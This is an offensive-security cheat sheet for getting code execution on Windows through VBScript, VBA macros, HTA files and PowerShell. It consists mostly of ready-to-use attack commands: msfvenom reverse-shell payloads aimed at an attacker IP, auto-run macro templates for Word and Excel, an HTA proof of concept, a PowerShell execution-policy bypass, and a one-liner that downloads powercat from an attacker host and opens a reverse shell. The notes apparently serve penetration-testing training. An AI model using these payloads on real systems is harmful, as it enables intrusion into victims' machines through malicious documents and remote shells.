killchain-compendium/Exploits/Windows/Windows Scripting Host.md

93 lines
2.2 KiB
Markdown

# Windows Scripting Host (WSH)
## Visual Basic Script (VB Script)
* `cscript file.exe`, command line scripts
* `wscript file.exe`, UI scripts
* Example (watch out for the whitespace after path, it has to be included)
```sh
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
```
```sh
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
```
## Visual Basic for Application (VBA)
* Access Windows API via Macros
* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
* Create reverse shell
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
```
* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
```sh
Sub Document_Open()
SHELL
End Sub
Sub AutoOpen()
SHELL
End Sub
Sub SHELL()
<reverse shell goes here>
End Sub
```
## HTML Application (HTA)
* HTML file including some kind of scripting language like JS, VB, ActiveX
* `mshta` is used to excecute
### POC
* Download file via attacker's web server
* File should look like
```HTML
<html>
<body>
<script>
var shell= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(shell);
</script>
</body>
</html>
```
* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`
### Reverse Shell
* Craft reverse shell via `msfvenom`
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
```
* `msfconsole` via
```sh
use exploit/windows/misc/hta_server
```
## Powershell
* Powershell execution policy can be checked via
```sh
Get-ExecutionPolicy
```
* Set policy via
```sh
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
```
* Bypass via
```sh
powershell -ex bypass -File shell.ps1
```
* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
```sh
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
```
* Or use msfvenom
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
```